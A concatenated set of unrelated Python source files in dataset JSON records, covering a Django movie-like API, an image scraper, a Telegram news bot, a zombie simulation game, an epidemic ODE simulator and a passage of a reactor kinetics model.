pk=comment_pk)\n comment.delete()\n return Response(status=200)\n\n\n@api_view(['POST'])\ndef like(request, movie_pk):\n print(request.user)\n movie = get_object_or_404(Movie, pk=movie_pk)\n user = request.user\n if movie.like_users.filter(id=user.pk).exists():\n movie.like_users.remove(user)\n liked = False\n\n else:\n movie.like_users.add(user)\n liked = True\n\n context = {\n 'liked': liked,\n #'count': like_movies\n }\n\n return JsonResponse(context)\n\n\n@api_view(['GET'])\ndef checkLike(request, movie_pk):\n user = request.user\n print(user)\n movie = get_object_or_404(Movie, pk=movie_pk)\n if movie.like_users.filter(id=request.user.pk).exists():\n print('yes')\n liked = True\n else:\n liked = False\n print('no')\n context = {\n 'liked': liked,\n }\n return JsonResponse(context)\n\n\n#추천 알고리즘\n@api_view(['GET'])\ndef recommendation(request):\n user = request.user\n #유저가 좋아한 영화의 장르 추출\n like_genres = set() # 중복제거위해 set 사용\n if user.like_movies.exists():\n for movie in user.like_movies.all():\n #print(movie.genres_ids.values('id'))\n for genre in movie.genres_ids.all().values('id'):\n like_genres.add(genre['id'])\n print(like_genres)\n\n #좋아하는 장르별 영화 추천(좋아요 눌러진순)\n genre_dict = {}\n for genre in like_genres:\n name = get_object_or_404(Genre, pk=genre)\n movies = Movie.objects.annotate(num_like_users=Count(\n 'like_users')).filter(genres_ids=genre).all()[:8]\n serializer = RecommendationSerializer(movies, many=True)\n genre_dict[name.genre_name] = serializer.data\n #print(genre_dict)\n #genre_dict = genre_dict\n return JsonResponse(genre_dict)\n\n #좋아요 누른 영화가 없을 경우\n else:\n genre_dict = {}\n for genre in Genre.objects.all():\n print(genre.id, genre.genre_name)\n movies = Movie.objects.annotate(num_like_users=Count('like_users')).filter(genres_ids=genre.id).all()[:8]\n serializer = MovieListSerializer(movies, many=True)\n genre_dict[genre.genre_name] = serializer.data\n return JsonResponse(genre_dict)\n\n ","sub_path":"movie_api/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"613376006","text":"import os\nimport random\nimport time\nfrom concurrent.futures import ThreadPoolExecutor\nfrom multiprocessing import cpu_count\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\n\nfrom config import mongo, headers\n\n\nclass mzitu:\n image_path = ''\n\n def __init__(self, root, page=1, min_time=0, max_time=1):\n self.url = f'https://www.mzitu.com/page/{page}'\n self.root = root\n headers['referer'] = 'https://www.mzitu.com/'\n collection_name = 'mzitu'\n self.db = MongoClient(\n \"mongodb://%s:%s@%s:%s\" % (\n mongo.get('user'), mongo.get('password'), mongo.get('host'),\n mongo.get('port')))[mongo.get('database')]\n self.collection = self.db[collection_name]\n self.min_time = min_time\n self.max_time = max_time\n if collection_name in self.db.list_collection_names():\n print('集合已经存在')\n self.collection.drop()\n print('集合已经删除')\n\n def run(self):\n with ThreadPoolExecutor(max_workers=cpu_count()) as thread:\n thread.map(self.get_images,\n BeautifulSoup(requests.get(self.url, headers=headers).text, 'lxml').find('ul',\n id='pins').find_all(\n 'li'))\n\n def get_images(self, data):\n image = data.find('img')\n self.image_path = f'{self.root}/{image.get(\"alt\")}'\n os.makedirs(self.image_path, exist_ok=True)\n self.save_image(image.get('data-original'), '_avatar')\n with ThreadPoolExecutor(max_workers=cpu_count()) as thread:\n thread.submit(self.get_image, data.find('a').get('href'))\n\n def get_image(self, url):\n self.save_image(\n BeautifulSoup(requests.get(url, headers=headers).text, 'lxml').find('img', class_='blur').get('src'), '1')\n\n def save_image(self, url, file_name='only'):\n with open(f'{self.image_path}/{file_name}{os.path.splitext(url)[1]}', 'wb') as f:\n f.write(requests.get(url, headers=headers).content)\n print(f'成功下载 {url}')\n time.sleep(random.randint(self.min_time, self.max_time))\n\n\nif __name__ == '__main__':\n current_path = os.getcwd() + '/images'\n mzitu(current_path).run()\n","sub_path":"Reptiles/mzitu.py","file_name":"mzitu.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"562805325","text":"def comp(a):\n return a[1]\n\nclass Solution:\n def activitySelection(self,n,start,end):\n n=len(start)\n a=[]\n for i in range(n):\n a.append([start[i],end[i]])\n a=sorted(a,key=comp)\n res=1\n i=0\n for j in range(1,n):\n if(a[j][0]>a[i][1]):\n i=j\n res+=1\n return res\nn=int(input())\nstart=list(map(int,input().split()))\nend=list(map(int,input().split()))\nprint(Solution().activitySelection(n,start,end))\n\n","sub_path":"GreedyAlgo/01_activity_selection.py","file_name":"01_activity_selection.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"576042433","text":"# api/urls.py\nfrom django.urls import path, include\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom rest_framework.routers import DefaultRouter\nfrom .views import CrawlingView\n\n\n\ncrawling_list = CrawlingView.as_view({\n 'get': 'list',\n})\ncrawling_detail = CrawlingView.as_view({\n 'get': 'retrieve',\n 'delete': 'destroy',\n})\n\n\nurlpatterns = format_suffix_patterns([\n \n path('', crawling_list, name='crawling_list'),\n path('/', crawling_detail, name='crawling-detail'),\n\n \n])","sub_path":"backend/main_crawling/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"226182527","text":"\n\nfrom xai.brain.wordbase.nouns._civility import _CIVILITY\n\n#calss header\nclass _CIVILITIES(_CIVILITY, ):\n\tdef __init__(self,): \n\t\t_CIVILITY.__init__(self)\n\t\tself.name = \"CIVILITIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"civility\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_civilities.py","file_name":"_civilities.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"172154334","text":"from telegram import Update, ReplyKeyboardMarkup, ReplyKeyboardRemove, replymarkup\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackContext\nimport economist\nimport harvardbusiness\nimport reuters\nimport time\nfrom urllib.parse import quote\nfrom datetime import datetime\nimport copy\nimport numpy as np\nimport requests\n\n\nnews_url_dic = dict()\nnews_url_dic[\"economist\"] = economist.get_economist_news\nnews_url_dic[\"hbr\"] = harvardbusiness.get_hbr_news\nnews_url_dic[\"reuters\"] = reuters.get_reuters_news\n\ndef start(update: Update, _: CallbackContext) -> None:\n reply_keyboard = [[\"/Economist\"],[\"/HarvardBusinessReview\"],[\"/Reuters\"]]\n update.message.reply_text(\"Which news source would you like to view?\",reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))\n return None\n\ndef get_news_list(title_dic):\n to_view = \"Which article would you like to view?\\n\\n\"\n for idx in range(len(title_dic)):\n to_view += \"{}) {}\\n\".format(idx,title_dic[idx])\n to_view += \"\\nOr send /start to view news catalog again\"\n reply_keyboard = list()\n l = np.array(range(len(title_dic)))\n for row in np.array_split(l,3):\n reply_keyboard.append([ int(i) for i in row ])\n return to_view, reply_keyboard\n\ndef economist_command(update: Update, context: CallbackContext) -> None:\n if (datetime.utcnow()-context.bot_data['x'][\"timestamp\"]).total_seconds() > 43200:\n update.message.reply_text(\"Please wait while we receive the latest news.\")\n dispatcher_dic = add_news_sources()\n context.bot_data['x'] = dispatcher_dic.copy()\n handle = \"economist\"\n context.user_data['state'] = handle\n title_dic = context.bot_data['x'][handle]['title']\n to_view, reply_keyboard = get_news_list(title_dic)\n context.user_data['keyboard'] = reply_keyboard.copy()\n update.message.reply_text(to_view,reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))\n return None\n\ndef hbr_command(update: Update, context: CallbackContext) -> None:\n if (datetime.utcnow()-context.bot_data['x'][\"timestamp\"]).total_seconds() > 43200:\n update.message.reply_text(\"Please wait while we receive the latest news.\")\n dispatcher_dic = add_news_sources()\n context.bot_data['x'] = dispatcher_dic.copy()\n handle = \"hbr\"\n context.user_data['state'] = handle\n title_dic = context.bot_data['x'][handle]['title']\n to_view, reply_keyboard = get_news_list(title_dic)\n context.user_data['keyboard'] = reply_keyboard.copy()\n update.message.reply_text(to_view,reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))\n return None\n\ndef reuters_command(update: Update, context: CallbackContext) -> None:\n if (datetime.utcnow()-context.bot_data['x'][\"timestamp\"]).total_seconds() > 43200:\n update.message.reply_text(\"Please wait while we receive the latest news.\")\n dispatcher_dic = add_news_sources()\n context.bot_data['x'] = dispatcher_dic.copy()\n handle = \"reuters\"\n context.user_data['state'] = handle\n title_dic = context.bot_data['x'][handle]['title']\n to_view, reply_keyboard = get_news_list(title_dic)\n context.user_data['keyboard'] = reply_keyboard.copy()\n update.message.reply_text(to_view,reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))\n return None\n\n\ndef echo(update: Update, context: CallbackContext) -> None:\n article_number = 1e8\n user_input = update.message.text\n if user_input.isnumeric():\n article_number = int(float(user_input))\n handle = context.user_data['state']\n if article_number < len(context.bot_data['x'][handle]['news']):\n to_view_ls = context.bot_data['x'][handle]['news'][article_number]\n bot = context.bot\n for to_view in to_view_ls:\n bot.send_message(update.effective_chat.id, to_view)\n to_view = \"Send /start to view news catalog again\"\n update.message.reply_text(to_view,reply_markup=ReplyKeyboardRemove())\n else:\n update.message.reply_text(\n \"Your input value is too large.\",\n reply_markup=ReplyKeyboardMarkup(\n context.user_data['keyboard'],\n one_time_keyboard=True)\n )\n else:\n update.message.reply_text(\n \"Unable to understand your input.\",\n reply_markup=ReplyKeyboardMarkup(\n context.user_data['keyboard'],\n one_time_keyboard=True)\n )\n\n\ndef help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')\n return None\n\ndef add_news_source(dispatcher_dic, handle, headline_func):\n dispatcher_dic[handle] = dict()\n dispatcher_dic[handle]['news'] = dict()\n temp_url_dic, temp_title_dic = headline_func()\n get_news_func = news_url_dic[handle]\n for key in temp_url_dic:\n print(temp_url_dic[key])\n page = requests.get(temp_url_dic[key])\n dispatcher_dic[handle]['news'][key] = get_news_func(page)\n dispatcher_dic[handle]['title'] = temp_title_dic.copy()\n return None\n\ndef add_news_sources():\n dispatcher_dic = dict()\n dispatcher_dic[\"timestamp\"] = datetime.utcnow()\n add_news_source(dispatcher_dic,\"economist\",economist.get_headlines)\n add_news_source(dispatcher_dic,\"hbr\",harvardbusiness.get_headlines)\n add_news_source(dispatcher_dic,\"reuters\",reuters.get_headlines)\n print(datetime.now(),\"News have been loaded\")\n return dispatcher_dic\n\ndef main() -> None:\n \"\"\"Start the bot.\"\"\"\n # Create the Updater and pass it your bot's token.\n updater = Updater(TOKEN)\n\n # Get the dispatcher to register handlers\n dispatcher = updater.dispatcher\n\n dispatcher_dic = add_news_sources()\n dispatcher.bot_data[\"x\"] = dispatcher_dic.copy()\n \n # on different commands - answer in Telegram\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"Economist\", economist_command))\n dispatcher.add_handler(CommandHandler(\"HarvardBusinessReview\", hbr_command))\n dispatcher.add_handler(CommandHandler(\"Reuters\", reuters_command))\n dispatcher.add_handler(CommandHandler(\"help\", help_command))\n\n # on non command i.e message - echo the message on Telegram\n dispatcher.add_handler(MessageHandler(Filters.text & ~Filters.command, echo))\n\n # Start the Bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n return None\n\nif __name__ == \"__main__\":\n main()","sub_path":"news_bot.py","file_name":"news_bot.py","file_ext":"py","file_size_in_byte":6767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"350094168","text":"import cv2\nimport numpy as np\nimport timeit\nimport black\nimport color\nfrom collections import deque\n\nclasses = [30,117,134,149,164,181,198,215,231,247]\n\n\ndef predict(data_set):\n if(data_set[0]>220):\n return color.predict(data_set[1])\n else:\n return black.predict(data_set[1])\n\nim_all = deque()\nim_all.append(np.array([np.multiply(cv2.imread('ir/4/3.jpg', 0).astype(np.float32), 1.0 / 255.0)]))\nim_all.append(np.array([np.multiply(cv2.imread('ir/4/2.jpg', 0).astype(np.float32),1.0/255)]))\nim_all.append(np.array([np.multiply(cv2.imread('ir/4/1.jpg', 0).astype(np.float32),1.0/255)]))\n\n\nfor cnt in range(10):\n print(cnt+9)\n im = cv2.imread('ir/4/'+ str(4 + cnt) + '.jpg', 0)\n wv = np.array([np.multiply(cv2.imread('wv/4/' + str(4 + cnt) + '.jpg', 0).astype(np.float32), 1.0 / 255)])\n im_all.insert(0,np.array(\n [np.multiply(im.astype(np.float32), 1.0 / 255)]))\n set = np.vstack((im_all[0], wv, im_all[1], im_all[2], im_all[3])).T\n print('start')\n start = timeit.default_timer()\n data_set=[]\n arr =[]\n for i in range(22,458):\n for j in range(22,578):\n arr.append(predict([im[i,j],set[j - 22:j + 23, i - 22:i + 23]]))\n\n stop = timeit.default_timer()\n print(stop - start)\n arr=np.array(arr)\n arr=np.reshape(arr,(436,556))\n cv2.imwrite('predict/4/'+str(9+cnt)+'.jpg',arr)\n im_all.pop()\n","sub_path":"run_set.py","file_name":"run_set.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"478461934","text":"import random\n\nrandom.randint(1,10)\n\nclass Zombie:\n\n max_speed = 5\n horde = []\n plague_level = 10\n default_speed = 1\n\n max_strength = 8\n default_strength = 3\n\n def __str__(self):\n message = f'I am a Zombie running at {self.speed} speed, I have {len(Zombie.horde)} zombies brothers\\n'\n return message\n\n def __repr__(self):\n message = self.__str__()\n return message\n\n\n def __init__(self, speed, strength):\n \"\"\"Initializes zombie's speed as well as its strength\n add another lines\n to explain more\n \"\"\"\n if speed > Zombie.max_speed:\n self.speed = Zombie.default_speed\n else:\n self.speed = speed\n\n self.strength = strength if strength <= Zombie.max_strength else Zombie.max_strength\n\n @classmethod\n def spawn(cls):\n \"\"\"Spawns a random number of new zombies, based on the plague level,\n adding each one to the horde. Each zombie gets a random speed.\n Each zombie also gets a random strength.\n \"\"\"\n new_zombies = random.randint(1, Zombie.plague_level)\n count = 0\n\n while count < new_zombies:\n speed = random.randint(1, Zombie.max_speed)\n strength = random.randint(1, Zombie.max_strength)\n Zombie.horde.append(Zombie(speed, strength))\n count += 1\n \n input(f\"count {count}, new_zombies {new_zombies}, Zombie.horde {len(Zombie.horde)}\")\n print('->', len(Zombie.horde))\n\n @classmethod\n def new_day(cls):\n \"\"\"Represents the events of yet another day of the zombie apocalypse.\n Every day some zombies die off (phew!), some new ones show up,\n and sometimes the zombie plague level increases.\n the method invoke the increase plague \n \"\"\"\n Zombie.spawn()\n Zombie.some_die_off()\n Zombie.increase_plague_level()\n\n\n @classmethod\n def some_die_off(cls, max_num=10):\n \"\"\"Removes a random number (between 0 and 10) of zombies from the horde.\n \"\"\"\n how_many_die = random.randint(0, 10)\n counter = 0\n while (counter < how_many_die) and (len(Zombie.horde) > 0):\n random_zombie = random.randint(0,len(Zombie.horde) - 1)\n Zombie.horde.pop(random_zombie)\n counter += 1\n\n def encounter(self):\n \"\"\"This instance method represents you coming across a zombie! This will end in different ways:\n 1. You outrun the zombie and escape unscathed!\n 2. You don't outrun the zombie. You actually have to fist fight it. \n 3. You couldn't beat it, how petty :( now you die! \n Returns a summary of what happened.\n \"\"\"\n\n outrun = self.chase()\n encounter_result = ''\n\n if outrun:\n encounter_result = 'You escaped! - share it on Instagram'\n else:\n did_you_survive = self.fight()\n if did_you_survive:\n my_zombie_self = Zombie(10,10)\n Zombie.horde.append(my_zombie_self)\n encounter_result = 'You killed a Zombie! - but make a Zombie out of yourself!'\n else:\n encounter_result = 'You died.'\n \n return encounter_result\n\n def chase(self):\n \"\"\"Represents you trying to outrun this particular zombie.\n Uses `Zombie.max_speed` to generate a random number that represents how fast you manage to run.\n \"\"\"\n your_speed = random.randint(Zombie.max_speed - 1, Zombie.max_speed) # 50% chance to outrun!\n # your_speed = random.randint(1, Zombie.max_speed)\n return your_speed > self.speed\n\n def fight(self, superman_mode_=False):\n \"\"\"Represents you actually fighting a fuckin zombie!\n superman_mode just doubles your strength\n \"\"\"\n your_strength = random.randint(1, Zombie.max_strength) \n your_strength = your_strength * 2 if superman_mode_ else your_strength\n return your_strength > self.strength\n\n @classmethod\n def increase_plague_level(cls):\n \"\"\"generate a random number between 0 and 2 and increase Zombie.plague_level by that amount\n \"\"\"\n cls.plague_level += random.randint(0,2)\n\n\n# zz = Zombie(5,4)\n# print(zz)\n# Zombie.spawn()\n# print(Zombie)\n# print(zz)\n\n\nprint(Zombie.horde) # []\nZombie.new_day()\nprint(Zombie.horde) # [<__main__.Zombie object at 0x7f6f594f0d30>, <__main__.Zombie object at 0x7f6f594f0b70>, <__main__.Zombie object at 0x7f6f594f0d68>]\nzombie1 = Zombie.horde[0]\nprint(zombie1) # Speed: 1 -- Strength: 7\nzombie2 = Zombie.horde[1]\nprint(zombie2) # Speed: 2 -- Strength: 7\nprint(zombie1.encounter()) # You escaped!\nprint(zombie2.encounter()) # You fought the zombie and caught the plague. You are now a zombie too. Raaaawrgh\n# Zombie.new_day()\n# print(Zombie.horde) # [<__main__.Zombie object at 0x7f6f594f0d30>, <__main__.Zombie object at 0x7f6f594efef0>, <__main__.Zombie object at 0x7f6f594f0c50>, <__main__.Zombie object at 0x7f6f594f0cc0>]\n# zombie1 = Zombie.horde[0]\n# zombie2 = Zombie.horde[1]\n# print(zombie1.encounter()) # You died!\n# print(zombie2.encounter()) # You escaped!","sub_path":"zombies.py","file_name":"zombies.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"602835553","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom datetime import timedelta\nimport numpy as np\nimport pandas as pd\nfrom scipy.integrate import solve_ivp\nfrom covsirphy.util.error import deprecate\nfrom covsirphy.util.term import Term\nfrom covsirphy.ode.mbase import ModelBase\n\n\nclass ODESimulator(Term):\n \"\"\"\n Simulation of an ODE model for one phase.\n\n Args:\n country (str or None): country name\n province (str or None): province name\n \"\"\"\n\n @deprecate(\"ODESimulator\", new=\"ODEHandler\", version=\"2.19.1-zeta-fu1\")\n def __init__(self, country=None, province=None):\n self.country = country or self.UNKNOWN\n self.province = province or self.UNKNOWN\n # keys: model, step_n, population, param_dict, y0_dict\n self.setting = {}\n # key: non-dim variable name, value: dimensional variable name\n self.var_dict = {}\n\n def add(self, model, step_n, population, param_dict=None, y0_dict=None):\n \"\"\"\n Add models to the simulator.\n\n Args:\n model (subclass of cs.ModelBase): the first ODE model\n step_n (int): the number of steps\n population (int): population in the place\n param_dict (dict):\n - key (str): parameter name\n - value (float): parameter value\n - dictionary of parameter values or None\n - if not include some params, the last values will be used\n - NameError when the model is the first model\n - NameError if new params are included\n y0_dict (dict):\n - key (str): variable name\n - value (float): initial value\n - dictionary of dimensional initial values or None\n - None or if not include some variables, the last values will be used\n - NameError when the model is the first model\n - NameError if new variable are included\n \"\"\"\n if self.setting:\n raise ValueError(\n \"Simulation for two phases is not supported from version 2.7.0\")\n # Register the setting\n self.setting = {\n \"model\": self._ensure_subclass(model, ModelBase, name=\"model\"),\n self.STEP_N: self._ensure_natural_int(step_n, name=\"step_n\"),\n \"population\": self._ensure_population(population),\n ModelBase.PARAM_DICT: self._ensure_parameters(model, param_dict),\n self.Y0_DICT: self._ensure_initial_values(model, y0_dict),\n }\n # Update variable dictionary\n self.var_dict.update(model.VAR_DICT)\n\n def _ensure_parameters(self, model, param_dict):\n \"\"\"\n Validate the dictionary of parameters.\n\n Args:\n model (subclass of cs.ModelBase): the ODE model\n param_dict (dict):\n - key (str): parameter name\n - value (float): parameter value\n\n Returns:\n dict(str, str): dictionary of parameters\n\n Note:\n If a parameter value is not registered, None will be registered.\n \"\"\"\n param_dict = param_dict or {}\n usable_dict = {\n p: param_dict[p] if p in param_dict else None for p in model.PARAMETERS}\n if None not in usable_dict.values():\n return usable_dict\n none_params = [k for (k, v) in usable_dict.items() if v is None]\n s = \"s\" if len(none_params) > 1 else \"\"\n raise NameError(\n f\"Parameter value{s} of {', '.join(none_params)} must be specified by @param_dict.\"\n )\n\n def _ensure_initial_values(self, model, y0_dict):\n \"\"\"\n Validate the dictionary of initial values.\n\n Args:\n model (subclass of cs.ModelBase): the ODE model\n y0_dict (dict): dictionary of initial values\n - key (str): dimensional variable name\n - value (int):initial value of the variable\n\n Returns:\n dict(str, str): dictionary of initial values\n\n Note:\n If initial value of a variable is not registered, None will be registered.\n \"\"\"\n y0_dict = y0_dict or {}\n usable_dict = {\n v: y0_dict[v] if v in y0_dict else None for v in model.VARIABLES}\n if None not in usable_dict.values():\n return usable_dict\n none_vars = [k for (k, v) in usable_dict.items() if v is None]\n s = \"s\" if len(none_vars) > 1 else \"\"\n raise NameError(\n f\"Initial value{s} of {', '.join(none_vars)} must be specified by @y0_dict.\"\n )\n\n def _solve_ode(self, model, step_n, param_dict, y0_dict, population):\n \"\"\"\n Solve ODE of the model.\n\n Args:\n model (subclass of cs.ModelBase): the ODE model\n step_n (int): the number of steps\n param_dict (dict): dictionary of parameter values\n - key (str): parameter name\n - value (float): parameter value\n y0_dict (dict): dictionary of initial values\n - key (str): dimensional variable name\n - value (int):initial value of the variable\n population (int): total population\n\n Returns:\n (pandas.DataFrame):\n Index\n reset index\n Columns\n - t (int): Elapsed time divided by tau value [-]\n - columns with dimensional variables\n \"\"\"\n tstart, dt, tend = 0, 1, step_n\n variables = model.VARIABLES[:]\n initials = [y0_dict[var] for var in variables]\n sol = solve_ivp(\n fun=model(population=population, **param_dict),\n t_span=[tstart, tend],\n y0=np.array(initials, dtype=np.int64),\n t_eval=np.arange(tstart, tend + dt, dt),\n dense_output=False\n )\n t_df = pd.Series(data=sol[\"t\"], name=self.TS)\n y_df = pd.DataFrame(data=sol[\"y\"].T.copy(), columns=variables)\n y_df = y_df.round()\n return pd.concat([t_df, y_df], axis=1)\n\n @deprecate(\n old=\"ODESimulator.run()\",\n new=\"ODESimulator.taufree(), .non_dim() or .dim(tau, start_date) directly\")\n def run(self):\n \"\"\"\n From version 2.7.0, it is not necessary to perform ODESimulator.run().\n Please directory use ODESimulator.taufree(), .non_dim() or .dim(tau, start_date)\n \"\"\"\n return self.taufree()\n\n def taufree(self):\n \"\"\"\n Return tau-free results.\n\n Returns:\n (pandas.DataFrame):\n Index\n reset index\n Columns\n - t (int): Elapsed time divided by tau value [-]\n - columns with dimensionalized variables\n \"\"\"\n df = self._solve_ode(**self.setting)\n df[self.TS] = df.index\n return df.reset_index(drop=True)\n\n def non_dim(self):\n \"\"\"\n Return the non-dimensionalized results.\n\n Returns:\n (pandas.DataFrame):\n Index\n reset index\n Columns\n - t (int): Elapsed time divided by tau value [-]\n - non-dimensionalized variables of Susceptible etc.\n \"\"\"\n df = self.taufree()\n df = df.set_index(self.TS)\n df = df.apply(lambda x: x / sum(x), axis=1)\n var_dict_rev = {v: k for (k, v) in self.var_dict.items()}\n df.columns = [var_dict_rev[col] for col in df.columns]\n df = df.reset_index()\n return df\n\n def dim(self, tau, start_date):\n \"\"\"\n Return the dimensionalized results.\n\n Args:\n tau (int): tau value [min]\n start_date (str): start date of the records, like 22Jan2020\n\n Returns:\n pandas.DataFrame\n Index\n reset index\n Columns\n - Date (pd.Timestamp): Observation date\n - Country (str): country/region name\n - Province (str): province/prefecture/state name\n - variables of the models (int)\n \"\"\"\n df = self.taufree()\n df = df.drop(self.TS, axis=1).reset_index(drop=True)\n var_cols = df.columns.tolist()\n df = df.astype(np.int64)\n # Date\n start_obj = self._ensure_date(start_date, name=\"start_date\")\n elapsed = pd.Series(df.index * tau)\n df[self.DATE] = start_obj + elapsed.apply(\n lambda x: timedelta(minutes=x)\n )\n # Place\n df[self.COUNTRY] = self.country\n df[self.PROVINCE] = self.province\n # Return the dataframe\n df = df.loc[:, [self.DATE, self.COUNTRY, self.PROVINCE, *var_cols]]\n return df\n","sub_path":"covsirphy/simulation/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":8771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"257013711","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 9 10:19:07 2020\r\n\r\n@author: Yugi\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom scipy.interpolate import interp1d\r\nfrom scipy.integrate import ode\r\nfrom scipy.integrate import odeint\r\nfrom scipy.integrate import solve_ivp\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport pandas as pd\r\nimport itertools\r\n#from RandomMs import SolarM\r\n'''\r\n \r\n Parameters\r\n ----------\r\n params : \r\n alpha= #average neutron life time\r\n lamb= #decay constant\r\n beta= #delayed neutron fraction\r\n c_pf= #specific heat of moderator\r\n c_pc= #specific heat of coolant\r\n m_f=#mass of fuel\r\n m_c=#mass of coolant\r\n mdot_h=#mass flow rate\r\n T_cine=#Temperature in\r\n a_f=#neutrons to thermal factor\r\n n_e= #scaling for power at equillibrium\r\n alpha_f= #Change in reactivity based on temp of fuel\r\n alpha_c=#Change in reactivity based on temp for moderator\r\n h=#heat transfer coefficient and total area of fuel\r\n Rf =#fouling factor\r\n Returns\r\n -------\r\n derivs : change in neutron density, precursor density, fuel temp, coolant temp\r\n'''\r\n\"\"\"specific outputs of the reactor and heatexchanger\"\"\"\r\nPower = [] #MWth, power of reactor over transient period\r\nPowere =[] #MWe, eletric power of reactor generated from 45% efficiency\r\nInletTemp = [] # Kelvin, Variation of inlet temperature\r\nfinaltemps = []# Kelvin, Variation of outlet temperature\r\nMdotO = []# m/s, Variation of velocity\r\nHtransfer = [] # W/K, Variation of the heat transfer coefficient\r\nQ = [] # W, Variation of heat transfer accross the heat exchanger\r\nNeutronD = [] #normalized neutron density\r\nVprofile=[] # m/s profile of velocity over 12 sections in 1m increments\r\nDelp = [] #Pa Pressure Drop over the reactor with respect to cycles\r\nFuelT =[]# K, Equilibrium Temperature of the fuel\r\nV = []# velocity at each time step in the reactor\r\n\r\n\"\"\"initialization parameters of the reactor active core region based off of \r\nsteady state calculations without thermohydraulic considerations\"\"\"\r\nIDfuelContainer = .35 #meter of the inner diameter fuel tank container\r\nODfuelcontainer =1.05 # meter of the outerdiameter fuel container\r\nHydD = (4*(math.pi/4)*(ODfuelcontainer**2 - IDfuelContainer**2))/(math.pi*(IDfuelContainer+ODfuelcontainer)) # meter the hydraulic diamter of the reactor\r\nACore =(math.pi/4)*(ODfuelcontainer**2 - IDfuelContainer**2) # m^2 the area of the core\r\nAout = .25 # m^2 the outlet arwa of the core\r\nNpebbles = 441000\r\nHreflector = [0.3,0.6,0.9,1.2,1.5,1.8,2.1,2.4,2.7,3.0] #meters Hieght of the total reactor core for profiles\r\nPebbleD = 0.03 # meters diameter of the fuel pebble\r\nSurfaceP = 4*math.pi*(PebbleD/2)**2\r\nTotSurf = SurfaceP*Npebbles\r\nh = 16000*TotSurf# W/K heat transfer area considering pebble surface area, initial estimate\r\nF1 = 0.05 # friction factor of the pebble bed reactor with a porosity of approximately .3-.4\r\nK =1700# constant value when solving out the frictional pressure drop integration solved from annular system of equations\r\ng = 9.81 #m/s^2 as the graviational constant\r\nu0 = 0.65 # initialized inlet velocity of the core\r\nporosity = .4 # constant porosity of the reactor\r\nDelP = 66300 # initialized pressure drop over reactor core\r\n\r\nT_cine = 600+273 # kelvin, initialized inlet temperature\r\nT_h_in = 750+273# kelvin, initialized outlet temperature found from steady state conditions\r\nmdot_h = 1319 # kg/s, initialized mass flow rate from stead state conditions\r\nb = 1/T_cine # K^-1, thermal expansion coefficent based on the ilet temperature of the core\r\nrho_h= 2518-0.406*(T_cine) #density in kg/m^3 in core\r\nmu_h= 0.000116*np.exp(3755/T_cine) #viscosity in Pa*s in core\r\nc_ph= 2415.78 #specific heat in J/kg*K in core\r\nk_h= 0.629697+0.0005*(T_cine) #thermal conductivity in W/mK in core\r\n\r\n\r\ndef dydt(t,y, params):\r\n x, y, z_f, z_c=y\r\n alpha,lamb,beta,c_pf,c_pc,m_f,m_c,mdot_h,T_cine,a_f,n_e,alpha_f,alpha_c,h=params\r\n\r\n T_fe=T_cine+(1/(2*mdot_h*c_pc)+(1/h))*a_f*n_e #equillibrium of fuel temp\r\n T_ce=T_cine+(a_f*n_e/(2*mdot_h*c_pc)) #equillibrium of coolant temp\r\n u=(T_cine-T_cine)/T_cine\r\n w=(1300-mdot_h)/mdot_h\r\n Power = 1 #percentage\r\n p_c=(Power-(x))*10\r\n p=p_c+alpha_c*T_ce*z_c+alpha_f*T_fe*z_f\r\n \r\n \r\n dydt1 = -(beta*x/alpha)+(beta*y/alpha)+(p/alpha)+(p*x/alpha)\r\n dydt2 = (x-y)*lamb\r\n dydt3 = ((a_f*n_e*x)/(m_f*c_pf*T_fe))-(h*z_f/(m_f*c_pf))+(h*T_ce*z_c/(m_f*c_pf*T_fe))\r\n dydt4 = (h*T_fe*z_f/(m_c*c_pc*T_ce))-((2*c_pc*mdot_h+h)*z_c/(m_c*c_pc))+((2*mdot_h*T_cine*u)/(m_c*T_ce))\r\n 